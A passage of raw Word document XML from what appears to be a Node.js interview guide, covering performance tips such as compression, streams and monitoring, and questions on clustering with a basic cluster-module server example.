          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compression:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use gzip or Brotli compression to reduce the size of responses sent to clients. Use the compression middleware with Express.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2A7524"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compression = require('compression');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCB726"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app.use(compression());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B1B2D" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Content Delivery Network (CDN):</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Serve static assets via a CDN to reduce latency and improve load times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FE5642"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7. Use Efficient Data Structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FCB56" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Appropriate Data Structures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the most suitable data structures for your operations to enhance performance. For example, use Map for fast key-value lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14688647"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8. Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F408B8" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Memory Leaks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly monitor and profile memory usage to identify and fix memory leaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF33CB" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Profiling Tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilize tools like Node.js’ built-in profiler or external tools like Clinic.js to analyze memory usage and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72A806"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9. Optimize Static Asset Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4A746" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Serve Static Assets Efficiently:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Nginx or other web servers to serve static assets like images, CSS, and JavaScript files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B21202" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Bundlers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Employ tools like Webpack or Rollup to bundle and minify front-end assets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77698794"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10. Monitor and Analyze Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26832317" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Application Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use APM (Application Performance Monitoring) tools like New Relic, Datadog, or Prometheus to monitor application performance in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5F99B" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging and Alerts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement logging with tools like Winston or Morgan and set up alerts to notify you of performance issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A57765"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11. Asynchronous I/O Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE20720" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Avoid Heavy Computations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offload heavy computations to worker threads or external services to keep the event loop free.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3841A0" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilize Node.js streams to handle large data efficiently by processing data in chunks rather than loading it all into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127BE45C"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35F4685A"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readableStream = fs.createReadStream('large-file.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5410BF"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readableStream.on('data', (chunk) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013573D"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process chunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41068FB5" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7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3C3F6B6" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>12. Security Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC636E" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implement Rate Limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Protect your application from abuse by implementing rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DF5F75" w14:textId="77777777" w:rsidR="008E5B7E" w:rsidRPr="00DA2F32" w:rsidRDefault="008E5B7E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secure Sensitive Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure sensitive data is encrypted and transmitted securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F8C737" w14:textId="77777777" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4245DE5C" w14:textId="0D7038EE" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB9209" w14:textId="77777777" w:rsidR="00E40D14" w:rsidRPr="00DA2F32" w:rsidRDefault="00E40D14" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="616161"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc178383225"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>senior, experienced candidates:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="351E2CED"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43" w:name="_Toc178383226"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q41. What are streams in Node.js, and how can they be used?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="61AE48C7"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44" w:name="_Toc178383227"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q42. What is clustering in Node.js, and how can it be used to improve application performance?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="078114C9" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clustering in Node.js is a technique used to improve the scalability and performance of Node.js applications, particularly those that are CPU-bound. By default, Node.js is single-threaded, meaning it can only use one CPU core at a time. Clustering allows you to take advantage of multi-core systems by running multiple instances of the Node.js application in parallel, each on a separate core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D5EEC"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t>1. What is clustering in Node.js, and why is it important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF7F25" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="185"/>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Clustering in Node.js involves creating multiple instances of the Node.js process, known as workers, that share the same server port and can handle requests concurrently. This is important because Node.js is single-threaded, and clustering allows the application to utilize multiple CPU cores, improving performance and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D6824"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t>2. How do you implement clustering in a Node.js application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1830DB50" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="186"/>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Clustering can be implemented using the built-in cluster module. Here’s a basic example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F51E65"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cluster = require('cluster');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9BF7ED"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http = require('http');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0382F846"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numCPUs = require('os').cpus().length;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527B393F"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C4FF8FB"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if (cluster.isMaster) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F9FE3"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Fork workers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09756DC2"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for (let i = 0; i &lt; numCPUs; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790057FC"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cluster.fork();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C4B56"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D22E30E"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2E6D6E7F"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cluster.on('exit', (worker, code, signal) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734D2E2"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console.log(`Worker ${worker.process.pid} died`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008AEC4A"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C979198"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB975B3"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Workers can share any TCP connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE50E40"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http.createServer((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546065E5"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res.writeHead(200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131E852"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res.end('Hello World\n');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AA5B5E"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}).listen(8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C800D3A"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7882902" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In this example, the master process forks worker processes equal to the number of CPU cores, and each worker handles incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A21BF"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t>3. What are the benefits of using clustering in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D6524" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EDFE3A" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Increased Performance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clustering allows Node.js to handle more requests concurrently by utilizing multiple CPU cores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EE357" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Failover:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> If one worker crashes, others can continue handling requests, increasing reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A46C80" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="187"/>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 xml:space="preserve"> The master process automatically distributes incoming connections across the worker processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE359EA"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t>4. How does the master-worker model work in Node.js clustering?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD6A07" w14:textId="77777777" w:rsidR="009169EF" w:rsidRPr="00DA2F32" w:rsidRDefault="009169EF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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In the master-worker model:</w:t>
      </w:r>
    </w:p>
